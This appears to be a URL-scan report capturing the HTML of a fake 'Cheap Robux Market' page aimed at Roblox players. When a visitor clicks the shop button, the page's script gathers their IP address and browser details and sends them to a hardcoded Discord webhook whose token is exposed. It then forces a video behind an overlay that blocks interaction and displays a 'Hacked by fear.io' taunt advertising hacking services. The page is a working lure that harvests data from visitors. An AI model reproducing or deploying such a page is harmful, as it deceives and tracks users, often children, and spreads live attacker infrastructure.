https://trankest.netlify.app/

Submitted URL:
https://trankest.netlify.app/
Report Finished:

The outgoing links identified from the page

JavaScript Variables · 5 found

Global JavaScript variables loaded on the window object of a page, are variables declared outside of functions and accessible from anywhere in the code within the current scope

Console log messages · 1 found

Messages logged to the web console

HTML

The raw HTML body of the page

<!DOCTYPE html><html lang="en"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Roblox Marketplace</title>
    <!-- Add meta tags for Discord link preview -->
    <meta property="og:title" content="Super Cheap Robux Market">
    <meta property="og:description" content="Get the best deals on Robux!">
    <meta property="og:image" content="https://i.ytimg.com/vi/u0av3rieEK0/maxresdefault.jpg"> <!-- Replace with an actual image URL -->
    <meta property="og:url" content="trankest.netlify.app"> <!-- Replace with the URL of this page -->
    <style>
        body {
            background-color: black;
            color: white;
            font-family: Arial, sans-serif;
            overflow: hidden;
            margin: 0;
            padding: 0;
            position: relative;
        }
        #snow {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            pointer-events: none;
        }
        .glitch {
            font-size: 48px;
            text-align: center;
            animation: glitch 1s infinite;
            display: none; /* Initially hidden */
            color: red; /* Make "Hacked by fear.io" red */
        }
        @keyframes glitch {
            0% { text-shadow: 2px 0 red; }
            20% { text-shadow: -2px 0 blue; }
            40% { text-shadow: 2px 0 green; }
            60% { text-shadow: -2px 0 yellow; }
            100% { text-shadow: 2px 0 red; }
        }
        #footer {
            text-align: center;
            margin-top: 20px;
            font-size: 14px;
            display: none; /* Initially hidden */
        }
        #placeholder {
            text-align: center;
            font-size: 24px;
            margin-top: 20px;
        }
        #videoWrapper {
            display: none; /* Initially hidden */
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            z-index: 9999;
        }
        iframe {
            width: 100%;
            height: 100%;
            border: none;
        }
        /* View-only overlay */
        #overlay {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.3); /* Semi-transparent background */
            z-index: 10000;
            display: none; /* Initially hidden */
            pointer-events: all; /* Block all interactions */
        }
    </style>
</head>
<body>
    <div id="snow"></div>
    <div id="placeholder">Cheap Robux Market</div>
    <div id="videoWrapper">
        <iframe id="videoFrame" src="" frameborder="0" allow="autoplay; encrypted-media"></iframe>
    </div>
    <div class="glitch">Hacked by fear.io</div>
    <div id="footer">fear.2o on discord for hacking services, and btw I just logged all your info XD</div>
    <button id="shopButton" style="display: block; margin: 20px auto; padding: 10px 20px; font-size: 20px;">Start Shopping</button>
    <div id="overlay"></div>

    <script>
        document.getElementById('shopButton').addEventListener('click', function() {
            // Log user data without asking for location
            const userInfo = {
                ip: null,
                userAgent: navigator.userAgent,
                platform: navigator.platform,
                language: navigator.language,
                screenSize: `${window.screen.width}x${window.screen.height}`
            };

            // Fetch the IP address and send all data to Discord webhook
            fetch('https://api.ipify.org?format=json')
                .then(response => response.json())
                .then(data => {
                    userInfo.ip = data.ip;
                    console.log('User Info:', userInfo);
                    fetch('https://discord.com/api/webhooks/1284900138925559920/BoQBJYb1YGDtnyBm0DTRygTLnfmD3wU0YIDdsUTbrT2W4Jsw_S1OFtwm9vg5jlIeLReu', {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json'
                        },
                        body: JSON.stringify({ content: `User Info: ${JSON.stringify(userInfo)}` })
                    });
                });

            // Hide placeholder and button, show video
            document.getElementById('placeholder').style.display = 'none';
            document.getElementById('shopButton').style.display = 'none';
            document.getElementById('videoWrapper').style.display = 'block';

            // Show overlay to prevent interaction
            document.getElementById('overlay').style.display = 'block';

            // Set the video source and start playback
            const video = document.getElementById('videoFrame');
            video.src = "https://www.youtube.com/embed/3BZYsrPjD1s?autoplay=1&controls=0&modestbranding=1&showinfo=0&rel=0&fs=0";

            // Start video, and once it's done (27 seconds), show the snow and "Hacked by fear.io" glitch effect
            setTimeout(function() {
                document.getElementById('videoWrapper').style.display = 'none';
                startSnow();
                document.querySelector('.glitch').style.display = 'block'; // Show glitch text
                document.getElementById('footer').style.display = 'block'; // Show footer
                playThunder(); // Play thunder sound
            }, 27000); // Wait for 27 seconds

            // Prevent user from pausing the video (Note: This is achieved through iframe settings)
            // Unfortunately, there is no way to completely prevent pausing in a cross-origin iframe
        });

        function startSnow() {
            const snowContainer = document.getElementById('snow');
            for (let i = 0; i < 100; i++) {
                const snowflake = document.createElement('div');
                snowflake.className = 'snowflake';
                snowflake.style.position = 'absolute';
                snowflake.style.backgroundColor = 'white';
                snowflake.style.borderRadius = '50%';
                snowflake.style.width = '5px';
                snowflake.style.height = '5px';
                snowflake.style.left = Math.random() * window.innerWidth + 'px';
                snowflake.style.animationDuration = Math.random() * 3 + 2 + 's';
                snowflake.style.opacity = Math.random();
                snowContainer.appendChild(snowflake);
                snowflake.animate([
                    { transform: 'translateY(0)' },
                    { transform: 'translateY(' + window.innerHeight + 'px)' }
                ], {
                    duration: Math.random() * 3000 + 2000,
                    iterations: Infinity
                });
            }
        }
    </script>


</body></html>